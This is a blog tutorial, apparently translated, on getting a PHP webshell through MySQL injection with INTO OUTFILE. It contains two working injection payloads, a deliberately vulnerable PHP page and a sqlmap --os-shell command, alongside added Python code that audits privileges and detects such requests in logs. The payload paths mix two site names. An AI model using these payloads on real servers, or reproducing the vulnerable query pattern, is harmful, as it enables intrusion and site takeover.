Two Ways to Write a One-Liner via MySQL Injection and Quickly Get a Webshell

Exploitation requires all of the following conditions:

  1. root privileges on MySQL
  2. GPC disabled (single quotes can be used)
  3. The absolute path is known (not needed for reading files, but required for writing)
  4. --secure-file-priv is not configured
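The four conditions above can be verified from the database side before anyone reaches for a payload. The following is an added example in Python, not code from the original post: it interprets the value of `@@secure_file_priv` and the rows returned by `SHOW GRANTS` for the application account, both of which an administrator can query directly, and says whether an injection through that account could write a file under the web root. The account name `'webapp'@'localhost'`, the web root and every grant string are constructed for the example.

```python
"""Audit the server-side preconditions for INTO OUTFILE abuse.

Added example, not code from the original post. It interprets the text of
two things an administrator can query directly on the MySQL server:

    SELECT @@secure_file_priv;
    SHOW GRANTS FOR 'webapp'@'localhost';   -- account name is an assumption

and reports whether an injection through that account could write a file
under the web root. All sample values below are constructed.
"""
import posixpath
import re


def classify_secure_file_priv(value):
    """Map @@secure_file_priv to what it permits.

    MySQL semantics: NULL disables LOAD DATA / SELECT ... INTO OUTFILE
    entirely, an empty string imposes no restriction, and a path confines
    reads and writes to that directory.
    """
    if value is None:
        return "disabled"
    if value == "":
        return "unrestricted"
    return "restricted"


# FILE is a global privilege, so it can only be conferred by a grant ON *.*
_GLOBAL_GRANT = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+\*\.\*\s+TO\s+", re.I)


def grants_allow_file(grant_rows):
    """True if any SHOW GRANTS row confers FILE (directly or via ALL PRIVILEGES)."""
    for row in grant_rows:
        m = _GLOBAL_GRANT.match(row.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "ALL PRIVILEGES" in privs or "FILE" in privs:
            return True
    return False


def _overlaps(allowed_dir, webroot):
    """True if one directory contains the other (absolute POSIX paths assumed)."""
    a, w = posixpath.normpath(allowed_dir), posixpath.normpath(webroot)
    return posixpath.commonpath([a, w]) in (a, w)


def outfile_write_possible(secure_file_priv, grant_rows, webroot):
    """Combine both checks. Returns (possible, reason)."""
    if not grants_allow_file(grant_rows):
        return False, "account lacks the global FILE privilege"
    mode = classify_secure_file_priv(secure_file_priv)
    if mode == "disabled":
        return False, "secure_file_priv is NULL: import/export disabled"
    if mode == "restricted":
        if _overlaps(secure_file_priv, webroot):
            return True, "secure_file_priv directory overlaps the web root"
        return False, "writes confined to %s, outside the web root" % secure_file_priv
    return True, "FILE privilege plus unrestricted secure_file_priv"


# Constructed samples: the setup the post relies on (root, no restriction) ...
ROOT_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
# ... and a least-privilege application account with table-level rights only
WEBAPP_GRANTS = ["GRANT USAGE ON *.* TO 'webapp'@'localhost'",
                 "GRANT SELECT, INSERT, UPDATE ON `app`.* TO 'webapp'@'localhost'"]
WEBROOT = "/home/wwwroot/5ime.cn"   # constructed web root

if __name__ == "__main__":
    for label, sfp, grants in [("post's setup", "", ROOT_GRANTS),
                               ("root, exports confined", "/var/lib/mysql-files", ROOT_GRANTS),
                               ("least-privilege account", "", WEBAPP_GRANTS)]:
        print(label, "->", outfile_write_possible(sfp, grants, WEBROOT))
```

The verdict points straight at the fix: run the application under an account that never holds FILE, and set `secure_file_priv` in the server option file either to a dedicated directory outside the web root or to NULL. Either change alone removes condition 1 or condition 4 and both techniques in this post stop working.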

1. union

```sql
id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>' into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php'%23
```

`<? phpinfo(); ?>` is the content that gets written; you can substitute your own one-liner. `/home/wwwroot/5ime.cn/luan_phpinfo.php` is a file inside an existing directory of the site, i.e. the name of the file to create.

2. no union

```sql
id=2) into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php' fields terminated by '<? phpinfo(); ?>'%23
```

I first saw the second method in a post on T00ls (吐司) dated 2015-1-24; T00ls really does have a lot of experts. The result looks like this:

[Screenshot: Webshell]

The second method gets a shell by injecting the field delimiter, so the query result must have more than one column; the usual injection point satisfies this condition.
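A detection view of the two payloads, as an added example that is not part of the original post: a Python scanner over constructed access-log lines that flags the `INTO OUTFILE` / `DUMPFILE` clause, the `FIELDS TERMINATED BY` trick and an embedded PHP tag, and records whether a keyword blacklist like the one in luan_test.php (which only rejects the word "union") would have let the request through. The log lines, client IPs and host are constructed; the injected values are the two payloads shown above, URL-encoded the way a web server would log them.

```python
"""Flag file-write injection attempts in web server access logs.

Added example, not code from the original post. It shows why the keyword
check in luan_test.php (drop the request if the parameter contains "union")
does not stop the second technique, and what a detector should key on
instead: the INTO OUTFILE / DUMPFILE clause, the FIELDS TERMINATED BY trick
and an embedded PHP tag. Log lines, host and IPs are constructed; the two
injected values are the post's own payloads, URL-encoded as a server would
log them.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Combined-log prefix; only the client IP and the request target are needed
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each indicator is checked against the URL-decoded query string
_INDICATORS = [
    ("into_outfile",         re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I)),
    ("fields_terminated_by", re.compile(r"\b(fields\s+terminated|lines\s+(terminated|starting))\s+by\b", re.I)),
    ("php_tag",              re.compile(r"<\?(php\b|=)?", re.I)),
]


def naive_union_filter(decoded):
    """Mirror of luan_test.php: allow unless the lowercased input contains 'union'."""
    return "union" not in decoded.lower()


def inspect_target(target):
    """Return the indicator names present in a request target's decoded query."""
    decoded = unquote_plus(urlsplit(target).query)
    return [name for name, rx in _INDICATORS if rx.search(decoded)]


def scan_log(lines):
    """Return one finding per request whose query carries a file-write indicator."""
    findings = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue                      # not a parseable request line
        target = m.group("target")
        hits = inspect_target(target)
        if not hits:
            continue
        decoded = unquote_plus(urlsplit(target).query)
        findings.append({
            "ip": m.group("ip"),
            "target": target,
            "indicators": hits,
            # would luan_test.php's blacklist have let this request through?
            "passes_union_blacklist": naive_union_filter(decoded),
        })
    return findings


# Constructed sample log: method 1 (union), method 2 (no union), two benign requests
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jan/2015:10:00:01 +0800] "GET /luan_test.php?user=root%27%20union%20select%201,2,3,4,5,6,7,%27%3C?%20phpinfo();%20?%3E%27%20into%20outfile%20%27/home/wwwroot/5ime.cn/luan_phpinfo.php%27%23 HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Jan/2015:10:00:02 +0800] "GET /luan_test.php?user=root%27%20into%20outfile%20%27/home/wwwroot/5ime.cn/luan_phpinfo.php%27%20fields%20terminated%20by%20%27%3C?%20phpinfo();%20?%3E%27%23 HTTP/1.1" 200 398 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [24/Jan/2015:10:00:03 +0800] "GET /luan_test.php?user=alice HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [24/Jan/2015:10:00:04 +0800] "GET /search.php?q=union+station HTTP/1.1" 200 882 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["indicators"], "blacklist passes:", f["passes_union_blacklist"])
```

The second finding is the interesting one: it carries all three indicators yet `passes_union_blacklist` is true, while the harmless `union+station` search is rejected by the blacklist and never flagged by the scanner. Matching the write clause itself, rather than a keyword that one of the two techniques never uses, is what makes the detection hold for both variants.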

Exploitation with sqlmap

Take luan_test.php as the example:

```php
<?php
// Deliberately vulnerable test page: the only defence is a "union" blacklist,
// and the query is still built by string interpolation.
@$link = mysql_connect("localhost", "root", "");
mysql_select_db("mysql", $link);
$user = strtolower($_GET['user']);
if (strpos($user, "union") === false) {
    $sql = "SELECT * FROM user where user='{$user}'";
    echo $sql . '<br>';
    mysql_query($sql);
    echo mysql_errno() . ": " . mysql_error() . " ";
}
?>
```

After testing, the latest version of sqlmap does in fact support this method:

```
C:\luan\sqlmap>python sqlmap.py -u "http://192.168.2.200/luan_test.php?user=root" --os-shell
```

[Screenshot: Webshell]

However, if --os-shell cannot be used, sqlmap also has an option for writing files; I tested it and it did not succeed, which means sqlmap can only upload its own webshell.

[Screenshot: Webshell]

If tool-only users run into this situation, just use sqlmap --os-shell and work through the webshell that sqlmap uploads.

Author: iami233
Link: https://5ime.cn/webshell.html
License: This article is licensed under CC BY-NC-SA 3.0 CN